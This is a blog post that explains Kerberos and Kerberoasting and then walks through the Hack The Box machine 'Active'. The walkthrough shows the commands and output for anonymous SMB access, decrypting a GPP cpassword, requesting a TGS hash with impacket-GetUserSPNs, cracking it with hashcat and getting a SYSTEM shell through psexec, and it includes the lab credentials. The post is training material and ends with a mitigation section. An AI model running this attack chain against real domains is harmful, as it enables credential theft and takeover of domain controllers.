Skip to main content
  1. Posts/

Understanding Kerberoasting

·5 mins
active-directory
Table of Contents

What is Kerberos?
#

Kerberos is the system users within an AD domain can use to authenticate to some service on the network. The following image is a good way to describe the process:

kerb-1

Before you can authenticate to a service, you need to get a Ticket Granting Ticket (TGT) from the Key Distribution Center (KDC). The KDC is a part of the Domain Controller. You tell the KDC you want to authenticate to a service and provide your request, encrypted with your password hash. The KDC can decrypt your request using your NTLM hash and gives you a TGT encrypted with your same NTLM hash.

Next, you can use that TGT to request a ticket for a specific service. The KDC won’t check to see if you have permissions to access the service, it just gives you a ticket to access that service (TGS) that is split into two parts one part is encrypted with the requested service’s NTLM hash, and the other part is encrypted with the TGT session key.

You send the server-half of the ticket to the service and it verifies that it can decrypt it with its own NTLM hash. Then it checks to see if you have any privileges to access the resource, or it authenticates the request before it authorizes an action.

Then, if you are all set and have privileges there you can do what you need to do with the service.

Okay, so how can this be taken advantage of?

Well, with Kerberoasting.

What is Kerberoasting?
#

So, because of how this works your system doesn’t need to know the account name of the service - but the KDC does need this information so it can encrypt the server portion of the TGS. Specifically, the KDC needs to know the SPN (Service Principal Name) for the service that uniquely identifies it.

There is also a distinction to be made between computer accounts and user accounts. User accounts are the ones people use to log in and computer accounts are typically auto-rotated, long, and random. So we will likely only crack a User SPN.

We can use something like GetUserSPNs to enumerate user accounts that have an SPN set, implying that they are associated with a service account. Then we can try and crack those hashes. This tool just asks for a TGS for each unique User SPN account.

Let’s walk through an example using things we have already learned so far.

Example - HTB Active
#

We begin with a port scan that shows us that a ton of ports are open but one of them is for SMB and we can see that some of the shares are public:

╰─ smbclient -L 10.129.168.186             
Password for [WORKGROUP\kali]:
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Replication     Disk      
	SYSVOL          Disk      Logon server share 
	Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.168.186 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

We can look around in Replication and find an interesting file called Groups.xml:

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
  .                                   D        0  Sat Jul 21 05:37:44 2018
  ..                                  D        0  Sat Jul 21 05:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 15:46:06 2018

		5217023 blocks of size 4096. 237617 blocks available

If we download this and view it we see a password is being stored here for a service account:

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

This is a GPP/cpassword which used to be how Microsoft stored AES encrypted passwords, until they accidentally published the key used when encrypting them. We can decrypt it with gpp-decrypt like this:

╰─ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

From here, we can use this credential for further enumeration in SMB and other post-compromise enumeration. We can also use impacket-GetUserSPNS to get a TGS for another user with an SPN:

╰─ impacket-GetUserSPNs -dc-ip 10.129.168.186 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 14:06:40.351723  2024-04-26 22:59:56.568548             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$592c0de873d4244aa705906bc2d79075$3a69a51abb281519ffbd25f3f55aeafeec49f32edadd890ef430f248b4cbbf3bce1c0a94485532194dc9365f0af58e513f36236787365981d1c8118418a931da26936715aa810fb873f2828c9bf4e163b73c214a58c49bfff6e3964db4b4e69814a22379103e0c25d6e00199a856b5225a0ab1b621222e69b776fd43e6d4238775507b230bf186d80e31906bb336eed5738940c7b785f1c7beb4ef8937a364b3b6f428295d2012d1944e5baf1ecf67089dec3fe977922fbb5972b993e954597a6ba41abd6e962428a770111fe69a943c91e83b7d49062cd07ac5f97f46905fd5d89f2f0---SNIP---

We can load this into hashcat and give it a crack:

╰─ hashcat -m 13100 hash.txt ~/Desktop/Useful-Misc./rockyou.txt

We get a password and can use it with psexec to get a shell on the DC:

╰─ impacket-psexec administrator:Ticketmaster1968@10.129.168.186
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on 10.129.168.186.....
[*] Found writable share ADMIN$
[*] Uploading file UVLrlMsI.exe
[*] Opening SVCManager on 10.129.168.186.....
[*] Creating service GWiw on 10.129.168.186.....
[*] Starting service GWiw.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

In summary, we found an SMB share with a GPP/cpassword that we cracked, allowing us to make valid requests to the KDC, which then gave us a TGS for the Administrator user who had a crack-able password.

Preventing Kerberoasting Attacks
#

The issue isn’t really that much with Kerberos itself, but with the use of passwords that are easy to crack being used on service accounts. You could mitigate this risk by implementing a good password policy on all accounts including service accounts.

Related

IPv6 MITM & Passback Attacks
·5 mins
active-directory
IPv6 DNS Takeover # Another internal attack vector we should keep in mind has to do with IPv6 and how it is configured with DHCP.
LLMNR Poisoning & SMB Relay Attacks
·9 mins
active-directory
What is LLMNR? # LLMNR (Link-Local Multicast Name Resolution) is one of multiple local host resolution protocols.
Felonious Forums - HTB Web Challenge
·4 mins
web htb
In this challenge we are greeted with a web page: Let&rsquo;s go ahead and make an account and very quickly we can observe that we are able to make and post threads with markdown content.